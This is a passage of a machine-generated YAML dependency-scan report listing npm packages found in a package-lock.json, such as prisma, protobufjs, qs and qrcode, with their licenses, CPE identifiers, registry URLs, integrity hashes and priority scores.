https://registry.npmjs.org/postcss-selector-parser/-/postcss-selector-parser-6.1.2.tgz integrity: sha512-Q8qQfPiZ+THO/3ZrOrO0cJJKfpYCagtMUkXbnEfmgUjwXg6z/WBeOyS9APBBPCTSiDV+s4SwQGu8yFsiMRIudg== dependencies: cssesc: ^3.0.0 util-deprecate: ^1.0.2 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 738a4e319226bde2 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: postcss-value-parser 4.2.0' title: postcss-value-parser 4.2.0 description: 'Package discovered: postcss-value-parser 4.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: d70570520f43a33c name: postcss-value-parser version: 4.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:postcss-value-parser:postcss-value-parser:4.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss-value-parser:postcss_value_parser:4.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss_value_parser:postcss-value-parser:4.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss_value_parser:postcss_value_parser:4.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss-value:postcss-value-parser:4.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss-value:postcss_value_parser:4.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss_value:postcss-value-parser:4.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss_value:postcss_value_parser:4.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss:postcss-value-parser:4.2.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:postcss:postcss_value_parser:4.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/postcss-value-parser@4.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/postcss-value-parser/-/postcss-value-parser-4.2.0.tgz integrity: sha512-1NNCs6uurfkVbeXG4S8JFT9t19m45ICnif8zWLd5oPSZ50QnwMfK+H3jv408d4jw/7Bttv5axS5IiHoLaVNHeQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f330341278522955 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: prisma 5.22.0' title: prisma 5.22.0 description: 'Package discovered: prisma 5.22.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f76e4353403c9c3d name: prisma version: 5.22.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:prisma:prisma:5.22.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/prisma@5.22.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/prisma/-/prisma-5.22.0.tgz integrity: sha512-vtpjW3XuYCSnMsNVBjLMNkTj6OZbudcPPTPYHqX0CJfpcdWciI1dM8uHETwmDxxiqEwCIE6WvXucWUetJgfu/A== dependencies: '@prisma/engines': 5.22.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9fc67df1307075e9 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: process-nextick-args 2.0.1' title: process-nextick-args 2.0.1 description: 'Package discovered: process-nextick-args 2.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: da765da41b164754 name: process-nextick-args version: 2.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:process-nextick-args:process-nextick-args:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:process-nextick-args:process_nextick_args:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:process_nextick_args:process-nextick-args:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:process_nextick_args:process_nextick_args:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:process-nextick:process-nextick-args:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:process-nextick:process_nextick_args:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:process_nextick:process-nextick-args:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:process_nextick:process_nextick_args:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:process:process-nextick-args:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:process:process_nextick_args:2.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/process-nextick-args@2.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz integrity: sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b351d49072943449 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: prop-types 15.8.1' title: prop-types 15.8.1 description: 'Package discovered: prop-types 15.8.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 2485766b0114da33 name: prop-types version: 15.8.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:prop-types:prop-types:15.8.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:prop-types:prop_types:15.8.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:prop_types:prop-types:15.8.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:prop_types:prop_types:15.8.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:prop:prop-types:15.8.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:prop:prop_types:15.8.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/prop-types@15.8.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/prop-types/-/prop-types-15.8.1.tgz integrity: sha512-oj87CgZICdulUohogVAR7AjlC0327U4el4L6eAvOqCeudMDVU0NThNaV+b9Df4dXgSP1gXMTnPdhfe/2qDH5cg== dependencies: loose-envify: ^1.4.0 object-assign: ^4.1.1 react-is: ^16.13.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: acadb8b8517c78d3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: proto-list 1.2.4' title: proto-list 1.2.4 description: 'Package discovered: proto-list 1.2.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 685c0e3e50c6553a name: proto-list version: 1.2.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:proto-list:proto-list:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proto-list:proto_list:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proto_list:proto-list:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proto_list:proto_list:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proto:proto-list:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proto:proto_list:1.2.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/proto-list@1.2.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/proto-list/-/proto-list-1.2.4.tgz integrity: sha512-vtK/94akxsTMhe0/cbfpR+syPuszcuwhqVjJq26CuNDgFGj682oRBXOP5MJpv2r7JtE8MsiepGIqvvOTBwn2vA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 44c7a82b0c4aafcf ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: proto3-json-serializer 2.0.2' title: proto3-json-serializer 2.0.2 description: 'Package discovered: proto3-json-serializer 2.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 5add12638aea166c name: proto3-json-serializer version: 2.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:proto3-json-serializer:proto3-json-serializer:2.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proto3-json-serializer:proto3_json_serializer:2.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proto3_json_serializer:proto3-json-serializer:2.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proto3_json_serializer:proto3_json_serializer:2.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proto3-json:proto3-json-serializer:2.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proto3-json:proto3_json_serializer:2.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proto3_json:proto3-json-serializer:2.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proto3_json:proto3_json_serializer:2.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proto3:proto3-json-serializer:2.0.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proto3:proto3_json_serializer:2.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/proto3-json-serializer@2.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/proto3-json-serializer/-/proto3-json-serializer-2.0.2.tgz integrity: sha512-SAzp/O4Yh02jGdRc+uIrGoe87dkN/XtwxfZ4ZyafJHymd79ozp5VG5nyZ7ygqPM5+cpLDjjGnYFUkngonyDPOQ== dependencies: protobufjs: ^7.2.5 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f337eadf0901e415 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: protobufjs 7.5.6' title: protobufjs 7.5.6 description: 'Package discovered: protobufjs 7.5.6' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: a5b5323abf9aae9f name: protobufjs version: 7.5.6 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-3-Clause spdxExpression: BSD-3-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:protobufjs_project:protobufjs:7.5.6:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/protobufjs@7.5.6 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/protobufjs/-/protobufjs-7.5.6.tgz integrity: sha512-M71sTMB146U3u0di3yup8iM+zv8yPRNQVr1KK4tyBitl3qFvEGucq/rGDRShD2rsJhtN02RJaJ7j5X5hmy8SJg== dependencies: '@protobufjs/aspromise': ^1.1.2 '@protobufjs/base64': ^1.1.2 '@protobufjs/codegen': ^2.0.5 '@protobufjs/eventemitter': ^1.1.0 '@protobufjs/fetch': ^1.1.0 '@protobufjs/float': ^1.0.2 '@protobufjs/inquire': ^1.1.1 '@protobufjs/path': ^1.1.2 '@protobufjs/pool': ^1.1.0 '@protobufjs/utf8': ^1.1.1 '@types/node': '>=13.7.0' long: ^5.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d4455e8054d4e780 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: proxy-addr 2.0.7' title: proxy-addr 2.0.7 description: 'Package discovered: proxy-addr 2.0.7' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: ce10aea6db36304a name: proxy-addr version: 2.0.7 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:proxy-addr:proxy-addr:2.0.7:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proxy-addr:proxy_addr:2.0.7:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proxy_addr:proxy-addr:2.0.7:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proxy_addr:proxy_addr:2.0.7:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proxy:proxy-addr:2.0.7:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proxy:proxy_addr:2.0.7:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/proxy-addr@2.0.7 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/proxy-addr/-/proxy-addr-2.0.7.tgz integrity: sha512-llQsMLSUDUPT44jdrU/O37qlnifitDP+ZwrmmZcoSKyLKvtZxpyV0n2/bD/N4tBAAZ/gJEdZU7KMraoK1+XYAg== dependencies: forwarded: 0.2.0 ipaddr.js: 1.9.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4788b4003cbe678a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: proxy-from-env 2.1.0' title: proxy-from-env 2.1.0 description: 'Package discovered: proxy-from-env 2.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: d0670890e90b35a8 name: proxy-from-env version: 2.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:proxy-from-env:proxy-from-env:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proxy-from-env:proxy_from_env:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proxy_from_env:proxy-from-env:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proxy_from_env:proxy_from_env:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proxy-from:proxy-from-env:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proxy-from:proxy_from_env:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proxy_from:proxy-from-env:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proxy_from:proxy_from_env:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proxy:proxy-from-env:2.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:proxy:proxy_from_env:2.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/proxy-from-env@2.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-2.1.0.tgz integrity: sha512-cJ+oHTW1VAEa8cJslgmUZrc+sjRKgAKl3Zyse6+PV38hZe/V6Z14TbCuXcan9F9ghlz4QrFr2c92TNF82UkYHA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 6d2187ed4d7bb00d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: qrcode 1.5.4' title: qrcode 1.5.4 description: 'Package discovered: qrcode 1.5.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 9616afcfad81bbcd name: qrcode version: 1.5.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:qrcode:qrcode:1.5.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/qrcode@1.5.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/qrcode/-/qrcode-1.5.4.tgz integrity: sha512-1ca71Zgiu6ORjHqFBDpnSMTR2ReToX4l1Au1VFLyVeBTFavzQnv5JxMFr3ukHVKpSrSA2MCk0lNJSykjUfz7Zg== dependencies: dijkstrajs: ^1.0.1 pngjs: ^5.0.0 yargs: ^15.3.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: cd93e60074e9daeb ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: qs 6.14.2' title: qs 6.14.2 description: 'Package discovered: qs 6.14.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: baa7b01807110a4c name: qs version: 6.14.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-3-Clause spdxExpression: BSD-3-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:qs_project:qs:6.14.2:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/qs@6.14.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/qs/-/qs-6.14.2.tgz integrity: sha512-V/yCWTTF7VJ9hIh18Ugr2zhJMP01MY7c5kh4J870L7imm6/DIzBsNLTXzMwUA3yZ5b/KBqLx8Kp3uRvd7xSe3Q== dependencies: side-channel: ^1.1.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4d4da368c4cb9e85 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: qs 6.15.1' title: qs 6.15.1 description: 'Package discovered: qs 6.15.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 994fc27bb4c175c9 name: qs version: 6.15.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-3-Clause spdxExpression: BSD-3-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:qs_project:qs:6.15.1:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/qs@6.15.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/qs/-/qs-6.15.1.tgz integrity: sha512-6YHEFRL9mfgcAvql/XhwTvf5jKcOiiupt2FiJxHkiX1z4j7WL8J/jRHYLluORvc1XxB5rV20KoeK00gVJamspg== dependencies: side-channel: ^1.1.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 53a30fbc709808bd ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: queue 6.0.2' title: queue 6.0.2 description: 'Package discovered: queue 6.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 3d2cabf593c9f69a name: queue version: 6.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:queue:queue:6.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/queue@6.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/queue/-/queue-6.0.2.tgz integrity: sha512-iHZWu+q3IdFZFX36ro/lKBkSvfkztY5Y7HMiPlOUjhupPcG2JMfst2KKEpu5XndviX/3UhFbRngUPNKtgvtZiA== dependencies: inherits: ~2.0.3 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ef5b9014e52d743a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: queue-microtask 1.2.3' title: queue-microtask 1.2.3 description: 'Package discovered: queue-microtask 1.2.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 254ae16d84fc4780 name: queue-microtask version: 1.2.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:queue-microtask:queue-microtask:1.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:queue-microtask:queue_microtask:1.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:queue_microtask:queue-microtask:1.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:queue_microtask:queue_microtask:1.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:queue:queue-microtask:1.2.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:queue:queue_microtask:1.2.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/queue-microtask@1.2.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/queue-microtask/-/queue-microtask-1.2.3.tgz integrity: sha512-NuaNSa6flKT5JaSYQzJok04JzTL1CA6aGhv5rfLW3PgqA+M2ChpZQnAC8h8i4ZFkBS8X5RqkDBHA7r4hej3K9A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: cbdbab233debac3e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: range-parser 1.2.1' title: range-parser 1.2.1 description: 'Package discovered: range-parser 1.2.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 4bcca27d3d8ccfdd name: range-parser version: 1.2.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:range-parser:range-parser:1.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:range-parser:range_parser:1.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:range_parser:range-parser:1.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:range_parser:range_parser:1.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:range:range-parser:1.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:range:range_parser:1.2.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/range-parser@1.2.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/range-parser/-/range-parser-1.2.1.tgz integrity: sha512-Hrgsx+orqoygnmhFbKaHE6c296J+HTAQXoxEF6gNupROmmGJRoyzfG3ccAveqCBrwr/2yxQ5BVd/GTl5agOwSg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 7d9cd0e4ae47337e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: raw-body 2.5.3' title: raw-body 2.5.3 description: 'Package discovered: raw-body 2.5.3' remediation: Track and scan dependencies. references: [] tags: - sbom 